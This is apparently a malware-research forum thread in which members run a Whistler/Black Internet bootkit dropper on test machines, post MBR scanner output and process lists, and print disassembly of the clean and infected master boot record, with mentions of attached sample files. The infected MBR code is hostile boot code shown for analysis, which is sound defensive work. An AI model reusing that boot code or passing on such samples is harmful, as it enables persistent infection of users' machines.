[a_d_13]

Hello,

Here is a possible dropper of Whistler bootkit, courtesy of sUBs. I haven't tested it, so if you do, please post results here.

Thanks,
--AD

[Elite]

Didn't open in IDA or step through with Olly, but no MBR modifications visible with the tool I used to check.

Of course, I can always cross check offline if requested with something else.
VM detection? Maybe.

Also, some weird usermode hooks inside IE after executing sample, referencing some strange but MS-looking DLL. IE is running in the background doing something after rebooting.

[Quads]

Checked MBR before running file

\\.\C: --> \\.\PhysicalDrive0
Size Device Name MBR Status
--------------------------------------------
149 GB \\.\PhysicalDrive0 Windows XP MBR code detected

Done! Press ENTER to exit...

Ran the file after

Processes
C:\Program Files\Internet Explorer\iexplore.exe used not by me
C:\DOCUME~1\John\LOCALS~1\Temp\loader.exe
C:\DOCUME~1\John\LOCALS~1\Temp\smss.exe

possibly entry added HKUS\S-1-5-21-484763869-1275210071-1644491937-1003\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User '?')


MBR
\\.\C: --> \\.\PhysicalDrive0

Size Device Name MBR Status
--------------------------------------------
149 GB \\.\PhysicalDrive0 Unknown MBR code

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:

Options:
[1] Dump the MBR of a physical disk to file.
[2] Restore the MBR of a physical disk with a standard boot code.
[3] Exit.

Enter your choice: Enter the physical disk number to fix (0-99, -1 to cancel):

Available MBR codes:
[ 0] Default (Windows XP)
[ 1] Windows XP
[ 2] Windows Server 2003
[ 3] Windows Vista
[ 4] Windows 2008
[ 5] Windows 7
[-1] Cancel

Please select the MBR code to write to this drive:
Do you want to fix the MBR code? Type 'YES' and hit ENTER to continue: Successfully wrote new MBR code!

Done! Press ENTER to exit...


After that I double checked

\\.\C: --> \\.\PhysicalDrive0
Size Device Name MBR Status
--------------------------------------------
149 GB \\.\PhysicalDrive0 Windows XP MBR code detected

Done! Press ENTER to exit...


Quads

[chemist]

I was not able to infect vm at all, with any installer. Was able to infect my test machine with sUBs sample:

MBRCheck, version 1.1.0
(c) 2010, AD
\\.\C: --> \\.\PhysicalDrive0

Size Device Name MBR Status
--------------------------------------------
74 GB \\.\PhysicalDrive0 Known-bad MBR code detected (Whistler / Black Internet)!

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:

RKU showed Possible Rootkit Activity Detected. No signs in DDS.txt.

[Quads]

I was not able to infect vm at all, with any installer. Was able to infect my test machine with sUBs sample:

MBRCheck, version 1.1.0
(c) 2010, AD
\\.\C: --> \\.\PhysicalDrive0

Size Device Name MBR Status
--------------------------------------------
74 GB \\.\PhysicalDrive0 Known-bad MBR code detected (Whistler / Black Internet)!

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:

RKU showed Possible Rootkit Activity Detected. No signs in DDS.txt.

where do I get the newer version of MBRcheck?? Please,

edit
Just found it to download

Quads

[EP_X0FF]

Yes it works fine on vm, try latest Virtual Box. And yes, this is BlackInternet.

MBR modification detected, no stealth defense detected (sorry for ugly format, post directly from viewer).
Malicious smss.exe, loader.exe present :)

Original MBR

Code: Select all

00000000: 33C0                               xor ax, ax
00000002: 8ED0                                     mov ss, ax
00000004: BC007C                               mov sp, 7C00h
00000007: FB                                      sti 
00000008: 50                                      push ax
00000009: 07                                      pop es
0000000A: 50                                      push ax
0000000B: 1F                                      pop ds
0000000C: FC                                      cld 
0000000D: BE1B7C                              mov si, 7C1Bh
00000010: BF1B06                              mov di, 061Bh
00000013: 50                                      push ax
00000014: 57                                      push di
00000015: B9E501                              mov cx, 01E5h
00000018: F3A4                                  rep movsb 
0000001A: CB                                      retf 
0000001B: BDBE07                              mov bp, 07BEh
0000001E: B104                                  mov cl, 04h
00000020: 386E00                              cmp [bp], ch
00000023: 7C09                                  jl 2Eh
00000025: 7513                                  jnz 3Ah
00000027: 83C510                              add bp, 0010h
0000002A: E2F4                                  loop 20h
0000002C: CD18                                  int 18h
0000002E: 8BF5                                  mov si, bp
00000030: 83C610                              add si, 0010h
00000033: 49                                      dec cx
00000034: 7419                                  jz 4Fh
00000036: 382C                                  cmp [si], ch
00000038: 74F6                                  jz 30h
0000003A: A0B507                              mov al, [7B5h]
0000003D: B407                                  mov ah, 07h
0000003F: 8BF0                                  mov si, ax
00000041: AC                                      lodsb 
00000042: 3C00                                  cmp al, 00h
00000044: 74FC                                  jz 42h
00000046: BB0700                              mov bx, 0007h
00000049: B40E                                  mov ah, 0Eh
0000004B: CD10                                  int 10h
0000004D: EBF2                                  jmp 41h
0000004F: 884E10                              mov [bp+10h], cl
00000052: E84600                              call 009Bh
00000055: 732A                                  jnb 81h
00000057: FE4610                              inc byte ptr [bp+10h]
0000005A: 807E040B                          cmp byte ptr [bp+04h], 0Bh
0000005E: 740B                                  jz 6Bh
00000060: 807E040C                          cmp byte ptr [bp+04h], 0Ch
00000064: 7405                                  jz 6Bh
00000066: A0B607                              mov al, [7B6h]
00000069: 75D2                                  jnz 3Dh
0000006B: 80460206                          add byte ptr [bp+02h], 06h
0000006F: 83460806                          add [bp+08h], 0006h
00000073: 83560A00                          adc [bp+0Ah], 0000h
00000077: E82100                              call 009Bh
0000007A: 7305                                  jnb 81h
0000007C: A0B607                              mov al, [7B6h]
0000007F: EBBC                                  jmp 3Dh
00000081: 813EFE7D55AA                  cmp [7DFEh], AA55h
00000087: 740B                                  jz 94h
00000089: 807E1000                          cmp byte ptr [bp+10h], 00h
0000008D: 74C8                                  jz 57h
0000008F: A0B707                              mov al, [7B7h]
00000092: EBA9                                  jmp 3Dh
00000094: 8BFC                                  mov di, sp
00000096: 1E                                      push ds
00000097: 57                                      push di
00000098: 8BF5                                  mov si, bp
0000009A: CB                                      retf 
0000009B: BF0500                              mov di, 0005h
0000009E: 8A5600                              mov dl, [bp]
000000A1: B408                                  mov ah, 08h
000000A3: CD13                                  int 13h
000000A5: 7223                                  jb CAh
000000A7: 8AC1                                  mov al, cl
000000A9: 243F                                  and al, 3Fh
000000AB: 98                                      cbw 
000000AC: 8ADE                                  mov bl, dh
000000AE: 8AFC                                  mov bh, ah
000000B0: 43                                      inc bx
000000B1: F7E3                                  mul bx
000000B3: 8BD1                                  mov dx, cx
000000B5: 86D6                                  xchg dl, dh
000000B7: B106                                  mov cl, 06h
000000B9: D2EE                                  shr dh, cl
000000BB: 42                                      inc dx
000000BC: F7E2                                  mul dx
000000BE: 39560A                              cmp [bp+0Ah], dx
000000C1: 7723                                  jnbe E6h
000000C3: 7205                                  jb CAh
000000C5: 394608                              cmp [bp+08h], ax
000000C8: 731C                                  jnb E6h
000000CA: B80102                              mov ax, 0201h
000000CD: BB007C                              mov bx, 7C00h
000000D0: 8B4E02                              mov cx, [bp+02h]
000000D3: 8B5600                              mov dx, [bp]
000000D6: CD13                                  int 13h
000000D8: 7351                                  jnb 12Bh
000000DA: 4F                                      dec di
000000DB: 744E                                  jz 12Bh
000000DD: 32E4                                  xor ah, ah
000000DF: 8A5600                              mov dl, [bp]
000000E2: CD13                                  int 13h
000000E4: EBE4                                  jmp CAh
000000E6: 8A5600                              mov dl, [bp]
000000E9: 60                                      pusha 
000000EA: BBAA55                              mov bx, 55AAh
000000ED: B441                                  mov ah, 41h
000000EF: CD13                                  int 13h
000000F1: 7236                                  jb 129h
000000F3: 81FB55AA                          cmp bx, AA55h
000000F7: 7530                                  jnz 129h
000000F9: F6C101                              test cl, 01h
000000FC: 742B                                  jz 129h
000000FE: 61                                      popa 
000000FF: 60                                      pusha 
00000100: 6A00                                  push 0000h
00000102: 6A00                                  push 0000h
00000104: FF760A                              push [bp+0Ah]
00000107: FF7608                              push [bp+08h]
0000010A: 6A00                                  push 0000h
0000010C: 68007C                              push 7C00h
0000010F: 6A01                                  push 0001h
00000111: 6A10                                  push 0010h
00000113: B442                                  mov ah, 42h
00000115: 8BF4                                  mov si, sp
00000117: CD13                                  int 13h
00000119: 61                                      popa 
0000011A: 61                                      popa 
0000011B: 730E                                  jnb 12Bh
0000011D: 4F                                      dec di
0000011E: 740B                                  jz 12Bh
00000120: 32E4                                  xor ah, ah
00000122: 8A5600                              mov dl, [bp]
00000125: CD13                                  int 13h
00000127: EBD6                                  jmp FFh
00000129: 61                                      popa 
0000012A: F9                                      stc 
0000012B: C3                                      ret 

New modified MBR

Code: Select all

00000000: 31C0                                  xor ax, ax
00000002: 8ED8                                  mov ds, ax
00000004: 8EC0                                  mov es, ax
00000006: 8ED0                                  mov ss, ax
00000008: BC007C                              mov sp, 7C00h
0000000B: BE007C                              mov si, 7C00h
0000000E: BF0006                              mov di, 0600h
00000011: B98000                              mov cx, 0080h
00000014: 6650                                  push eax
00000016: 66B837030000                  mov eax, 00000337h
0000001C: 6658                                  pop eax
0000001E: FC                                      cld 
0000001F: F366A5                              rep movsw 
00000022: EA270600006631              jmp far 3166:00000627h
00000029: C0BEBE07B1                      sar byte ptr [bp+07BEh], B1h
0000002E: 0466                                  add al, 66h
00000030: 87D9                                  xchg bx, cx
00000032: 6687CB                              xchg ecx, ebx
00000035: 66394408                          cmp [si+08h], eax
00000039: 7208                                  jb 43h
0000003B: 668B4408                          mov eax, [si+08h]
0000003F: 6603440C                          add eax, [si+0Ch]
00000043: 83C610                              add si, 0010h
00000046: E2ED                                  loop 35h
00000048: 6609C0                              or eax, eax
0000004B: 7418                                  jz 65h
0000004D: 6683C002                          add eax, 00000002h
00000051: B94000                              mov cx, 0040h
00000054: BB007C                              mov bx, 7C00h
00000057: E84F00                              call 00A9h
0000005A: 7209                                  jb 65h
0000005C: 6656                                  push esi
0000005E: 665E                                  pop esi
00000060: EA007C0000BEBE              jmp far BEBE:00007C00h
00000067: 07                                      pop es
00000068: B104                                  mov cl, 04h
0000006A: 803C80                              cmp byte ptr [si], FFFFFF80h
0000006D: 740F                                  jz 7Eh
0000006F: 382C                                  cmp [si], ch
00000071: 0F858300                          jnz 00F8h
00000075: 83C610                              add si, 0010h
00000078: E2F0                                  loop 6Ah
0000007A: 90                                      nop 
0000007B: 90                                      nop 
0000007C: CD18                                  int 18h
0000007E: 668B4408                          mov eax, [si+08h]
00000082: 89E3                                  mov bx, sp
00000084: B90100                              mov cx, 0001h
00000087: E81F00                              call 00A9h
0000008A: 730A                                  jnb 96h
0000008C: 8B4C02                              mov cx, [si+02h]
0000008F: B80102                              mov ax, 0201h
00000092: CD13                                  int 13h
00000094: 727D                                  jb 113h
00000096: 813EFE7D55AA                  cmp [7DFEh], AA55h
0000009C: 0F859500                          jnz 0135h
000000A0: 6656                                  push esi
000000A2: 665E                                  pop esi
000000A4: EA007C00006660              jmp far 6066:00007C00h
000000AB: BBAA55                              mov bx, 55AAh
000000AE: B441                                  mov ah, 41h
000000B0: CD13                                  int 13h
000000B2: 7304                                  jnb B8h
000000B4: F9                                      stc 
000000B5: 6661                                  popa 
000000B7: C3                                      ret 

[Elite]

Code: Select all

MBRCheck, version 1.1.0

(c) 2010, AD



\\.\C: --> \\.\PhysicalDrive0



      Size  Device Name          MBR Status

  --------------------------------------------

     10 GB  \\.\PhysicalDrive0   Known-bad MBR code detected (Whistler / Black Internet)!





Found non-standard or infected MBR.

Enter 'Y' and hit ENTER for more options, or 'N' to exit: 

Options:

  [1] Dump the MBR of a physical disk to file.

  [2] Restore the MBR of a physical disk with a standard boot code.

  [3] Exit.



Enter your choice: 



Done!  Press ENTER to exit...

Whooops. Looks like it worked after all.

[a_d_13]

Hello,

Has anyone got a Rootkit Unhooker or GMER log from a computer infected with this bootkit? If so, can you please upload it for reference? Or, if you have an infected VM, please get a log and post it.

Thanks,
--AD

[EP_X0FF]

In attach exe, BlackIntenet File Loader dll, BlackInternet driver from infected machine.

[Quads]

Hello,

Has anyone got a Rootkit Unhooker or GMER log from a computer infected with this bootkit? If so, can you please upload it for reference? Or, if you have an infected VM, please get a log and post it.

Thanks,
--AD

See attached log, Oh and I didn't have IE open during scanning with GMER, I hardly use IE

Quads